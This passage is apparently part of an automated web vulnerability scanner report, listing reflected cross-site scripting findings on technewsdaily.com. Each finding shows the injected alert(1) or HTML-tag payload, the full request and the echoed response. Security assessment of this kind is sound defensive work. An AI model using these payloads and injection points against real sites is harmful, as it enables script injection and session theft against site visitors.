X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834edce3'-alert(1)-'6af313e49d1/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.41. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /delicious-not-shutting-down-no-reason-to-panic-1834/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61885"><a>98580f18eb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /delicious-not-shutting-down-no-reason-to-panic-1834/?61885"><a>98580f18eb3=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/?61885"><a>98580f18eb3=1/" />
...[SNIP]...

1.42. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /delicious-not-shutting-down-no-reason-to-panic-1834/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add70'-alert(1)-'8b8d1bfde12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delicious-not-shutting-down-no-reason-to-panic-1834/?add70'-alert(1)-'8b8d1bfde12=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
"text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/?add70'-alert(1)-'8b8d1bfde12=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.43. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /delicious-social-bookmarking-alternatives-1831/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c56b'-alert(1)-'fd3074b97ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delicious-social-bookmarking-alternatives-18311c56b'-alert(1)-'fd3074b97ea/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
t type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-18311c56b'-alert(1)-'fd3074b97ea/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.44. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /delicious-social-bookmarking-alternatives-1831/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24b38'-alert(1)-'c4ad2cea373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delicious-social-bookmarking-alternatives-1831/?24b38'-alert(1)-'c4ad2cea373=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/?24b38'-alert(1)-'c4ad2cea373=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.45. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /delicious-social-bookmarking-alternatives-1831/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efcac"><a>dbbd9a31ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /delicious-social-bookmarking-alternatives-1831/?efcac"><a>dbbd9a31ba5=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/?efcac"><a>dbbd9a31ba5=1/" />
...[SNIP]...

1.46. http://www.technewsdaily.com/dmca-copyright/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /dmca-copyright/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96f9e'-alert(1)-'636bd5a0400 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dmca-copyright96f9e'-alert(1)-'636bd5a0400/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/dmca-copyright96f9e'-alert(1)-'636bd5a0400/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.47. http://www.technewsdaily.com/dmca-copyright/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /dmca-copyright/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83973'-alert(1)-'6a39f46af5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dmca-copyright/?83973'-alert(1)-'6a39f46af5=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/dmca-copyright/?83973'-alert(1)-'6a39f46af5=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.48. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /etomb-tweets-from-beyond-the-grave-1649/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c9fb'-alert(1)-'db60bcb0c1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etomb-tweets-from-beyond-the-grave-16499c9fb'-alert(1)-'db60bcb0c1c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40476

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-16499c9fb'-alert(1)-'db60bcb0c1c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.49. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /etomb-tweets-from-beyond-the-grave-1649/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664dd"><a>2fdfbe4d5ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etomb-tweets-from-beyond-the-grave-1649/?664dd"><a>2fdfbe4d5ea=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/?664dd"><a>2fdfbe4d5ea=1/" />
...[SNIP]...

1.50. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /etomb-tweets-from-beyond-the-grave-1649/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae63f'-alert(1)-'99560dcf432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etomb-tweets-from-beyond-the-grave-1649/?ae63f'-alert(1)-'99560dcf432=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/?ae63f'-alert(1)-'99560dcf432=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.51. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /facebook-cartoon-profile-picture-trends-1757/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b23'-alert(1)-'29f84241f15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /facebook-cartoon-profile-picture-trends-175713b23'-alert(1)-'29f84241f15/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ipt type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-175713b23'-alert(1)-'29f84241f15/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.52. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /facebook-cartoon-profile-picture-trends-1757/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb0a"><a>e723fad5a8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook-cartoon-profile-picture-trends-1757/?ddb0a"><a>e723fad5a8d=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69273

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/?ddb0a"><a>e723fad5a8d=1/" />
...[SNIP]...

